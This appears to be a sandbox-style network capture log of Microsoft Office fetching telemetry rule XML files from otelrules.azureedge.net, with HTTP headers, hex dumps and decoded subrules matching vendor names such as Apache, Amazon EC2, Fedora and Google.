                                                                                                                                                                                                                                                                                        x-ms-request-id: 1815e533-001e-0028-01d5-33c49f000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153702Z-174f78459685m244hC1EWRgp2c00000004y000000000hr0v
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:02 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        51192.168.2.44980413.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:02 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:02 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 400
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB2D62837"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 31c5dea7-101e-008d-51d5-3392e5000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153702Z-174f7845968vqt9xhC1EWRgten000000057g00000000678v
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:02 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        52192.168.2.44980713.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:03 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:03 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 448
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB389F49B"
                                                                                                                                                                                                                                                                                        x-ms-request-id: bdd7469a-701e-0053-5fd5-333a0a000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153703Z-174f7845968jrjrxhC1EWRmmrs000000058g00000000f1pf
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:03 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        53192.168.2.44980813.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:03 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:03 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 491
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B98B88612"
                                                                                                                                                                                                                                                                                        x-ms-request-id: b80249cf-101e-0017-2bd5-3347c7000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153703Z-174f7845968t42glhC1EWRa36w00000004x0000000007x3r
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:03 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        54192.168.2.44980513.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:03 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:03 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 425
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BBA25094F"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 63eb2845-501e-00a3-1dd5-33c0f2000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153703Z-174f7845968psccphC1EWRuz9s000000058000000000qny4
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:03 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        55192.168.2.44980913.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:03 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:03 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 416
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BAEA4B445"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 7cd113ea-e01e-0052-21d5-33d9df000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153703Z-174f7845968xlwnmhC1EWR0sv800000005100000000057vw
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:03 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        56192.168.2.44980613.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:03 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:03 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 475
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB2BE84FD"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 22e15e04-b01e-0070-3ed5-331cc0000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153703Z-174f7845968cpnpfhC1EWR3afc00000004s000000000dv30
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:03 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        57192.168.2.44981013.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:04 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:04 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 479
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B989EE75B"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 77d57460-901e-0083-6dd5-33bb55000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153704Z-174f7845968xlwnmhC1EWR0sv800000004yg00000000enhn
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:04 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        58192.168.2.44981113.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:04 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:04 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 415
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 554aabf5-b01e-00ab-71d5-33dafd000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153704Z-174f7845968psccphC1EWRuz9s000000058000000000qnza
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:04 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        59192.168.2.44981213.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:04 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:04 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 471
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
